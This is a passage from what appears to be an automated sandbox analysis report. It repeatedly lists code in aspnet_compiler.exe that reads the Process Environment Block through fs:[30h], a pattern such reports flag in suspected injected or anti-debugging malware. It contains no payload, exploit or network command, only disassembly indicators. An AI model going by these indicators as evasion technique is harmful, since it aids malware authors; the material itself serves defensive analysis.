          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AF2D0 mov eax, dword ptr fs:[00000030h]5_2_010AF2D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AF2D0 mov eax, dword ptr fs:[00000030h]5_2_010AF2D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010902E1 mov eax, dword ptr fs:[00000030h]5_2_010902E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010902E1 mov eax, dword ptr fs:[00000030h]5_2_010902E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010902E1 mov eax, dword ptr fs:[00000030h]5_2_010902E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0113F2F8 mov eax, dword ptr fs:[00000030h]5_2_0113F2F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011552E2 mov eax, dword ptr fs:[00000030h]5_2_011552E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010792FF mov eax, dword ptr fs:[00000030h]5_2_010792FF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011312ED mov eax, dword ptr fs:[00000030h]5_2_011312ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011312ED mov eax, dword ptr fs:[00000030h]5_2_011312ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011312ED mov eax, dword ptr fs:[00000030h]5_2_011312ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011312ED mov eax, dword ptr fs:[00000030h]5_2_011312ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011312ED mov eax, dword ptr fs:[00000030h]5_2_011312ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011312ED mov eax, dword ptr fs:[00000030h]5_2_011312ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011312ED mov eax, dword ptr fs:[00000030h]5_2_011312ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011312ED mov eax, dword ptr fs:[00000030h]5_2_011312ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011312ED mov eax, dword ptr fs:[00000030h]5_2_011312ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011312ED mov eax, dword ptr fs:[00000030h]5_2_011312ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011312ED mov eax, dword ptr fs:[00000030h]5_2_011312ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011312ED mov eax, dword ptr fs:[00000030h]5_2_011312ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011312ED mov eax, dword ptr fs:[00000030h]5_2_011312ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011312ED mov eax, dword ptr fs:[00000030h]5_2_011312ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B7505 mov eax, dword ptr fs:[00000030h]5_2_010B7505
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B7505 mov ecx, dword ptr fs:[00000030h]5_2_010B7505
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01154500 mov eax, dword ptr fs:[00000030h]5_2_01154500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01154500 mov eax, dword ptr fs:[00000030h]5_2_01154500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01154500 mov eax, dword ptr fs:[00000030h]5_2_01154500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01154500 mov eax, dword ptr fs:[00000030h]5_2_01154500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01154500 mov eax, dword ptr fs:[00000030h]5_2_01154500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01154500 mov eax, dword ptr fs:[00000030h]5_2_01154500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01154500 mov eax, dword ptr fs:[00000030h]5_2_01154500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01155537 mov eax, dword ptr fs:[00000030h]5_2_01155537
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AE53E mov eax, dword ptr fs:[00000030h]5_2_010AE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AE53E mov eax, dword ptr fs:[00000030h]5_2_010AE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AE53E mov eax, dword ptr fs:[00000030h]5_2_010AE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AE53E mov eax, dword ptr fs:[00000030h]5_2_010AE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AE53E mov eax, dword ptr fs:[00000030h]5_2_010AE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112F525 mov eax, dword ptr fs:[00000030h]5_2_0112F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112F525 mov eax, dword ptr fs:[00000030h]5_2_0112F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112F525 mov eax, dword ptr fs:[00000030h]5_2_0112F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112F525 mov eax, dword ptr fs:[00000030h]5_2_0112F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112F525 mov eax, dword ptr fs:[00000030h]5_2_0112F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112F525 mov eax, dword ptr fs:[00000030h]5_2_0112F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112F525 mov eax, dword ptr fs:[00000030h]5_2_0112F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BD530 mov eax, dword ptr fs:[00000030h]5_2_010BD530
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BD530 mov eax, dword ptr fs:[00000030h]5_2_010BD530
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01090535 mov eax, dword ptr fs:[00000030h]5_2_01090535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01090535 mov eax, dword ptr fs:[00000030h]5_2_01090535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01090535 mov eax, dword ptr fs:[00000030h]5_2_01090535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01090535 mov eax, dword ptr fs:[00000030h]5_2_01090535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01090535 mov eax, dword ptr fs:[00000030h]5_2_01090535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01090535 mov eax, dword ptr fs:[00000030h]5_2_01090535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0113B52F mov eax, dword ptr fs:[00000030h]5_2_0113B52F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108D534 mov eax, dword ptr fs:[00000030h]5_2_0108D534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108D534 mov eax, dword ptr fs:[00000030h]5_2_0108D534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108D534 mov eax, dword ptr fs:[00000030h]5_2_0108D534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108D534 mov eax, dword ptr fs:[00000030h]5_2_0108D534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108D534 mov eax, dword ptr fs:[00000030h]5_2_0108D534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108D534 mov eax, dword ptr fs:[00000030h]5_2_0108D534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01088550 mov eax, dword ptr fs:[00000030h]5_2_01088550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01088550 mov eax, dword ptr fs:[00000030h]5_2_01088550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B656A mov eax, dword ptr fs:[00000030h]5_2_010B656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B656A mov eax, dword ptr fs:[00000030h]5_2_010B656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B656A mov eax, dword ptr fs:[00000030h]5_2_010B656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107B562 mov eax, dword ptr fs:[00000030h]5_2_0107B562
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BB570 mov eax, dword ptr fs:[00000030h]5_2_010BB570
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BB570 mov eax, dword ptr fs:[00000030h]5_2_010BB570
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B4588 mov eax, dword ptr fs:[00000030h]5_2_010B4588
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110B594 mov eax, dword ptr fs:[00000030h]5_2_0110B594
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110B594 mov eax, dword ptr fs:[00000030h]5_2_0110B594
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107758F mov eax, dword ptr fs:[00000030h]5_2_0107758F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107758F mov eax, dword ptr fs:[00000030h]5_2_0107758F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107758F mov eax, dword ptr fs:[00000030h]5_2_0107758F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01082582 mov eax, dword ptr fs:[00000030h]5_2_01082582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01082582 mov ecx, dword ptr fs:[00000030h]5_2_01082582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BE59C mov eax, dword ptr fs:[00000030h]5_2_010BE59C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A15A9 mov eax, dword ptr fs:[00000030h]5_2_010A15A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A15A9 mov eax, dword ptr fs:[00000030h]5_2_010A15A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A15A9 mov eax, dword ptr fs:[00000030h]5_2_010A15A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A15A9 mov eax, dword ptr fs:[00000030h]5_2_010A15A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A15A9 mov eax, dword ptr fs:[00000030h]5_2_010A15A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011135BA mov eax, dword ptr fs:[00000030h]5_2_011135BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011135BA mov eax, dword ptr fs:[00000030h]5_2_011135BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011135BA mov eax, dword ptr fs:[00000030h]5_2_011135BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011135BA mov eax, dword ptr fs:[00000030h]5_2_011135BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0113F5BE mov eax, dword ptr fs:[00000030h]5_2_0113F5BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011005A7 mov eax, dword ptr fs:[00000030h]5_2_011005A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011005A7 mov eax, dword ptr fs:[00000030h]5_2_011005A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011005A7 mov eax, dword ptr fs:[00000030h]5_2_011005A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AF5B0 mov eax, dword ptr fs:[00000030h]5_2_010AF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AF5B0 mov eax, dword ptr fs:[00000030h]5_2_010AF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AF5B0 mov eax, dword ptr fs:[00000030h]5_2_010AF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AF5B0 mov eax, dword ptr fs:[00000030h]5_2_010AF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AF5B0 mov eax, dword ptr fs:[00000030h]5_2_010AF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AF5B0 mov eax, dword ptr fs:[00000030h]5_2_010AF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AF5B0 mov eax, dword ptr fs:[00000030h]5_2_010AF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AF5B0 mov eax, dword ptr fs:[00000030h]5_2_010AF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AF5B0 mov eax, dword ptr fs:[00000030h]5_2_010AF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A45B1 mov eax, dword ptr fs:[00000030h]5_2_010A45B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A45B1 mov eax, dword ptr fs:[00000030h]5_2_010A45B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011535D7 mov eax, dword ptr fs:[00000030h]5_2_011535D7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011535D7 mov eax, dword ptr fs:[00000030h]5_2_011535D7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011535D7 mov eax, dword ptr fs:[00000030h]5_2_011535D7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BE5CF mov eax, dword ptr fs:[00000030h]5_2_010BE5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BE5CF mov eax, dword ptr fs:[00000030h]5_2_010BE5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B55C0 mov eax, dword ptr fs:[00000030h]5_2_010B55C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A95DA mov eax, dword ptr fs:[00000030h]5_2_010A95DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010865D0 mov eax, dword ptr fs:[00000030h]5_2_010865D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BA5D0 mov eax, dword ptr fs:[00000030h]5_2_010BA5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BA5D0 mov eax, dword ptr fs:[00000030h]5_2_010BA5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011555C9 mov eax, dword ptr fs:[00000030h]5_2_011555C9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010FD5D0 mov eax, dword ptr fs:[00000030h]5_2_010FD5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010FD5D0 mov ecx, dword ptr fs:[00000030h]5_2_010FD5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BC5ED mov eax, dword ptr fs:[00000030h]5_2_010BC5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BC5ED mov eax, dword ptr fs:[00000030h]5_2_010BC5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010825E0 mov eax, dword ptr fs:[00000030h]5_2_010825E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AE5E7 mov eax, dword ptr fs:[00000030h]5_2_010AE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AE5E7 mov eax, dword ptr fs:[00000030h]5_2_010AE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AE5E7 mov eax, dword ptr fs:[00000030h]5_2_010AE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AE5E7 mov eax, dword ptr fs:[00000030h]5_2_010AE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AE5E7 mov eax, dword ptr fs:[00000030h]5_2_010AE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AE5E7 mov eax, dword ptr fs:[00000030h]5_2_010AE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AE5E7 mov eax, dword ptr fs:[00000030h]5_2_010AE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AE5E7 mov eax, dword ptr fs:[00000030h]5_2_010AE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A15F4 mov eax, dword ptr fs:[00000030h]5_2_010A15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A15F4 mov eax, dword ptr fs:[00000030h]5_2_010A15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A15F4 mov eax, dword ptr fs:[00000030h]5_2_010A15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A15F4 mov eax, dword ptr fs:[00000030h]5_2_010A15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A15F4 mov eax, dword ptr fs:[00000030h]5_2_010A15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A15F4 mov eax, dword ptr fs:[00000030h]5_2_010A15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A340D mov eax, dword ptr fs:[00000030h]5_2_010A340D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B8402 mov eax, dword ptr fs:[00000030h]5_2_010B8402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B8402 mov eax, dword ptr fs:[00000030h]5_2_010B8402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B8402 mov eax, dword ptr fs:[00000030h]5_2_010B8402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107C427 mov eax, dword ptr fs:[00000030h]5_2_0107C427
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107E420 mov eax, dword ptr fs:[00000030h]5_2_0107E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107E420 mov eax, dword ptr fs:[00000030h]5_2_0107E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107E420 mov eax, dword ptr fs:[00000030h]5_2_0107E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BA430 mov eax, dword ptr fs:[00000030h]5_2_010BA430
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0113F453 mov eax, dword ptr fs:[00000030h]5_2_0113F453
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108B440 mov eax, dword ptr fs:[00000030h]5_2_0108B440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108B440 mov eax, dword ptr fs:[00000030h]5_2_0108B440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108B440 mov eax, dword ptr fs:[00000030h]5_2_0108B440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108B440 mov eax, dword ptr fs:[00000030h]5_2_0108B440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108B440 mov eax, dword ptr fs:[00000030h]5_2_0108B440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108B440 mov eax, dword ptr fs:[00000030h]5_2_0108B440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BE443 mov eax, dword ptr fs:[00000030h]5_2_010BE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BE443 mov eax, dword ptr fs:[00000030h]5_2_010BE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BE443 mov eax, dword ptr fs:[00000030h]5_2_010BE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BE443 mov eax, dword ptr fs:[00000030h]5_2_010BE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BE443 mov eax, dword ptr fs:[00000030h]5_2_010BE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BE443 mov eax, dword ptr fs:[00000030h]5_2_010BE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BE443 mov eax, dword ptr fs:[00000030h]5_2_010BE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BE443 mov eax, dword ptr fs:[00000030h]5_2_010BE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A245A mov eax, dword ptr fs:[00000030h]5_2_010A245A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107645D mov eax, dword ptr fs:[00000030h]5_2_0107645D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01081460 mov eax, dword ptr fs:[00000030h]5_2_01081460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01081460 mov eax, dword ptr fs:[00000030h]5_2_01081460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01081460 mov eax, dword ptr fs:[00000030h]5_2_01081460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01081460 mov eax, dword ptr fs:[00000030h]5_2_01081460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01081460 mov eax, dword ptr fs:[00000030h]5_2_01081460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109F460 mov eax, dword ptr fs:[00000030h]5_2_0109F460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109F460 mov eax, dword ptr fs:[00000030h]5_2_0109F460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109F460 mov eax, dword ptr fs:[00000030h]5_2_0109F460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109F460 mov eax, dword ptr fs:[00000030h]5_2_0109F460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109F460 mov eax, dword ptr fs:[00000030h]5_2_0109F460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109F460 mov eax, dword ptr fs:[00000030h]5_2_0109F460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0115547F mov eax, dword ptr fs:[00000030h]5_2_0115547F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AA470 mov eax, dword ptr fs:[00000030h]5_2_010AA470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AA470 mov eax, dword ptr fs:[00000030h]5_2_010AA470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AA470 mov eax, dword ptr fs:[00000030h]5_2_010AA470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107B480 mov eax, dword ptr fs:[00000030h]5_2_0107B480
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01089486 mov eax, dword ptr fs:[00000030h]5_2_01089486
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01089486 mov eax, dword ptr fs:[00000030h]5_2_01089486
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110A4B0 mov eax, dword ptr fs:[00000030h]5_2_0110A4B0
